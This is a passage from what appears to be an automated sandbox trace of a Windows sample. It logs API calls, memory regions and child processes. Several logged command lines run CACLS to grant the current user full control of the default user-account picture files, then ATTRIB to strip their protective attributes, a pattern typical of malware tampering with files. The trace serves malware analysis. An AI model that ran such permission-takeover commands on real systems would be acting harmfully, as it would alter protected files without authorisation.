lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x40e4d8 [0186.415] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0186.415] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.415] GetLastError () returned 0x2 [0186.415] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x40e4d8 [0186.415] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0186.415] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.415] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.415] GetConsoleTitleW (in: lpConsoleTitle=0x2af300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.415] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af188, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af250 | out: lpAttributeList=0x2af188, lpSize=0x2af250) returned 1 [0186.415] UpdateProcThreadAttribute (in: lpAttributeList=0x2af188, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af188, lpPreviousValue=0x0) returned 1 [0186.415] GetStartupInfoW (in: lpStartupInfo=0x2af144 | out: lpStartupInfo=0x2af144*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.415] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.416] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af1e4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af230 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", lpProcessInformation=0x2af230*(hProcess=0x4c, hThread=0x50, dwProcessId=0x7ac, dwThreadId=0xe24)) returned 1 [0186.425] CloseHandle (hObject=0x50) returned 1 [0186.425] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.425] GetEnvironmentStringsW () returned 0x412410* [0186.425] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.425] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.459] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af124 | out: lpExitCode=0x2af124*=0x0) returned 1 [0186.459] CloseHandle (hObject=0x4c) returned 1 [0186.459] _vsnwprintf (in: _Buffer=0x2af26c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af130 | out: _Buffer="00000000") returned 8 [0186.459] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.459] GetEnvironmentStringsW () returned 0x412410* [0186.459] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.459] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.459] GetEnvironmentStringsW () returned 0x412410* [0186.459] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.459] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af188 | out: lpAttributeList=0x2af188) [0186.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.460] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.460] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.460] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.460] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.460] SetConsoleInputExeNameW () returned 0x1 [0186.460] GetConsoleOutputCP () returned 0x1b5 [0186.460] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.460] exit (_Code=0) Process: id = "383" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xdd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "382" os_parent_pid = "0xf74" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26744 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26745 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 26746 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 26747 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 26748 start_va = 0x5d0000 end_va = 0x5d8fff entry_point = 0x5d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26749 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26750 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26751 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26752 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26753 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26754 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26755 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26756 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26757 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 26758 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 26759 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26760 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26761 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26762 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26763 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26764 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26765 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 547 os_tid = 0x7f8 Thread: id = 548 os_tid = 0xfc0 Process: id = "384" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c40" os_pid = "0x7ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "382" os_parent_pid = "0xf74" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26766 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26767 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26768 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26769 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26770 start_va = 0x6f0000 end_va = 0x6f6fff entry_point = 0x6f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26771 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26772 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26773 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26774 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26775 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26776 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26777 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26778 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26779 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26780 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 26781 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26782 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26783 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26784 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26785 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26786 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26787 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26788 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26789 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26790 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26791 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26792 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26793 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 26794 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26795 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 549 os_tid = 0xe24 Process: id = "385" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26796 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26797 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26798 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26799 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 26800 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26801 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26802 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26803 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26804 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 26805 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26806 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26807 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26808 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26809 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 26810 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 26811 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26812 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26813 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26814 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26815 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26816 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26817 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26818 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26819 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26820 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26821 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26822 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26823 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 26824 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 26825 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26826 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 26827 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 26828 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 26829 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 26830 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 550 os_tid = 0xef4 [0186.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7b4 | out: lpSystemTimeAsFileTime=0x2ef7b4*(dwLowDateTime=0xa41325e0, dwHighDateTime=0x1d440a9)) [0186.513] GetCurrentProcessId () returned 0x128 [0186.513] GetCurrentThreadId () returned 0xef4 [0186.513] GetTickCount () returned 0x35485 [0186.513] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7ac | out: lpPerformanceCount=0x2ef7ac*=24330234135) returned 1 [0186.514] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0186.514] __set_app_type (_Type=0x1) [0186.514] __p__fmode () returned 0x76b331f4 [0186.514] __p__commode () returned 0x76b331fc [0186.514] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.514] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.514] GetCurrentThreadId () returned 0xef4 [0186.514] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xef4) returned 0x38 [0186.514] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.514] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.514] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.514] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.515] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef744 | out: phkResult=0x2ef744*=0x0) returned 0x2 [0186.515] VirtualQuery (in: lpAddress=0x2ef77b, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.515] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef714, dwLength=0x1c | out: lpBuffer=0x2ef714*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0186.515] GetConsoleOutputCP () returned 0x1b5 [0186.515] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.515] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.515] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.515] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.515] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.516] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.516] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.516] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.516] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.516] GetEnvironmentStringsW () returned 0x4e0308* [0186.516] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.516] GetEnvironmentStringsW () returned 0x4e0308* [0186.516] FreeEnvironmentStringsW (penv=0x4e0308) returned 1 [0186.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6b4 | out: 